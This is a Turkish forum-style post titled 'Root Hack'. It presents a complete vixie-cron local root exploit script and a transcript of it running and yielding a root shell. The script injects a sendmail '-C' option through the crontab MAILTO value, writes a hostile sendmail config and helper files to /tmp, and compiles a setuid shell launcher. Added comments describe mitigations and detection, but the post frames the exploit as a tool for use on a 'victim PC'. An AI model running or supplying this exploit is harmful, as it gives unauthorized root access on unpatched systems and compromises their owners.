Root Hack
-
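Arkadaşlar, root hack için victim PC'de bir account'unuzun olması gerekiyor. Eski bir Linux hatasıyla başlayalım. Bu hata, crontab'daki MAILTO değerini denetlemeden sendmail'e aktaran eski vixie-cron sürümlerini etkiler; güncel cron paketlerinde giderilmiştir.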
[gabo@web5 gabo]$ id;uname -a
uid=1012(me) gid=100(users) groups=100(users)
Linux ns 2.2.16 #97 Fri Jun 16 19:45:30 PDT 2000 i586 unknown
[gabo@web5 gabo]$ ls -lsa /usr/bin/crontab
12 -rws--x--x 1 root bin 10192 Jun 19 09:55 /usr/bin/crontab
----------------yapıştır----------------
#!/bin/sh
# Historical local privilege-escalation proof of concept; per its own banner
# it targets vixie-cron. Annotated here for analysis and detection.
#
# Mechanism as far as this script shows it:
#   - a crontab is installed whose MAILTO value begins with "-C/tmp/vixie-cf",
#     i.e. it looks like a sendmail command-line option rather than an address
#     (presumably cron hands MAILTO to sendmail without validation -- confirm
#     against the cron version in use);
#   - the alternate sendmail config sets DefaultUser=0:0 and names
#     /tmp/vixie-root as the local mailer program;
#   - that program compiles a small C file and marks the result mode 6755.
#
# Preconditions the script itself states: setuid /usr/bin/crontab, sendmail,
# gcc, and a writable /tmp mounted without noexec/nosuid.
#
# Defender notes:
#   - Mitigation: run a cron release that validates MAILTO, mount /tmp with
#     noexec,nosuid, limit crontab use (e.g. cron.allow), and keep compilers
#     off hosts that do not need them.
#   - Detection: crontab spool entries whose MAILTO starts with '-', sendmail
#     started with -C pointing at a non-standard path, setuid/setgid files
#     under /tmp, and the /tmp/vixie-* file names used below.
clear
echo '------------------------------------------------------------------'
echo 'Marchew Hyperreal Industries <marchew@dione.ids.pl>'
echo 'Stumilowy Las Team <100milowy@gdynia.ids.pl>'
echo '---------------------------- presents ----------------------------'
echo
echo ' -= vixie-cron root sploit Big_lord <lcamtuf@ids.pl> =-'
echo
echo '
Checking dependencies:'
echo -n '
vixie crontab: '
# Requires crontab to be setuid (-u) and executable; the script exits if not.
if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo -n '
Berkeley Sendmail: '
# Only checks that the sendmail binary exists, not its version.
if [ -f /usr/sbin/sendmail ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo -n '
gcc compiler: '
# A compiler on the host is a hard requirement of this script.
if [ -x /usr/bin/gcc ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
# The two conditions printed next are not tested by the script; both are
# points where hardening (patched cron, noexec/nosuid on /tmp) stops it.
echo ' [?] Dependiences not verified:'
echo '
proper version of vixie crontab'
echo '
writable /tmp without noexec/nosuid option'
echo '
Exploit started.'
echo "
Setting up .cf file for sendmail..."
# Writes an alternate sendmail configuration to a fixed path in /tmp.
# Security-relevant settings: queue directory /tmp, DefaultUser=0:0, and a
# local mailer whose program (P=) is /tmp/vixie-root.
cat >/tmp/vixie-cf <<__eof__
V7/Berkeley
O QueueDirectory=/tmp
O DefaultUser=0:0
R$+ $#local $: $1 regular local names
Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
T=DNS/RFC822/X-Unix,
A=vixie-root
__eof__
echo '
Setting up phase #1 tool (phase #2 tool compiler)...'
# Helper named as the mailer program above: compiles the C file written
# further down and sets mode 6755 (setuid + setgid) on the output. The
# resulting file owner depends on the uid this helper runs under.
cat >/tmp/vixie-root <<__eof__
#!/bin/sh
gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d
chmod 6755 /tmp/vixie-own3d
__eof__
chmod 755 /tmp/vixie-root
echo '
Setting up phase #2 tool (rootshell launcher)...'
# C source: sets uid and gid to 0, unlinks its own binary, then execs an
# interactive /bin/sh. The unlink means the binary is gone from /tmp after
# first use, so on-disk evidence of it is short-lived.
cat >/tmp/vixie-own3d.c <<__eof__
main() {
setuid(0);
setgid(0);
unlink("/tmp/vixie-own3d");
execl("/bin/sh","sh","-i",0);
}
__eof__
echo '
Putting evil crontab entry...'
# Installs the user's crontab from stdin. The MAILTO value is the trigger:
# it starts with "-C" followed by the config path written above. The job
# itself ("nonexist") runs every minute.
crontab - <<__eof__
MAILTO='-C/tmp/vixie-cf dupek'
* * * * * nonexist
__eof__
echo '
Patience is a virtue... Wait up to 60 seconds.'
ILE=0
echo -n '
Tick.'
# Polls every 2 seconds, at most 50 times, for /tmp/vixie-own3d; setting
# ILE=1000 ends the loop as soon as the file exists.
while [ $ILE -lt 50 ]; do
sleep 2
let ILE=ILE+1
test -f /tmp/vixie-own3d && ILE=1000
echo -n '.'
done
echo
echo '
Huh, done. Removing crontab entry...'
# Cleanup attempt. In the transcript that follows this script on the page,
# crontab prints its usage text at this step, so the entry may still be in
# the user's crontab spool afterwards -- worth checking during triage.
crontab -r
echo '
Removing helper files...'
# Deletes the helper files plus /tmp/df* and /tmp/qf* (presumably sendmail
# queue files, given QueueDirectory=/tmp above). The globs also match any
# unrelated /tmp files with those prefixes; all output is discarded.
rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null
echo '
And now...'
# Runs the compiled binary only if it was produced; otherwise reports that
# the system is patched or configured differently.
if [ -f /tmp/vixie-own3d ]; then
echo '
Entering root shell, babe '
echo
/tmp/vixie-own3d
echo
else
echo '[-] Oops, no root shell found, patched system or configuration problem '
fi
echo '
Exploit done.'
----------------Yapıştır----------------
[gabo@web5 gabo]$ sh rootcron.sh
------------------------------------------------------------------
Marchew Hyperreal Industries <marchew@dione.ids.pl>
Stumilowy Las Team <100milowy@gdynia.ids.pl>
---------------------------- presents ----------------------------
-= vixie-cron root sploit by Big_lord<lcamtuf@ids.pl> =-
Checking dependencies:
vixie crontab: OK
Berkeley Sendmail: OK
gcc compiler: OK
[?] Dependiences not verified:
proper version of vixie crontab
writable /tmp without noexec/nosuid option
Exploit started.
Setting up .cf file for sendmail...
Setting up phase #1 tool (phase #2 tool compiler)...
Setting up phase #2 tool (rootshell launcher)...
Putting evil crontab entry...
Patience is a virtue... Wait up to 60 seconds.
Tick.....................................................
Huh, done. Removing crontab entry...
crontab 2.3.2
crontab file <opts> replace crontab from file
crontab - <opts> replace crontab from stdin
crontab -u user specify user
crontab -l [user] list crontab for user
crontab -e [user] edit crontab for user
crontab -d [user] delete crontab for user
crontab -c dir specify crontab directory
Removing helper files...
And now...
Entering root shell, babe
bash# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
bash#
EDITED by CYB3R-SPY -
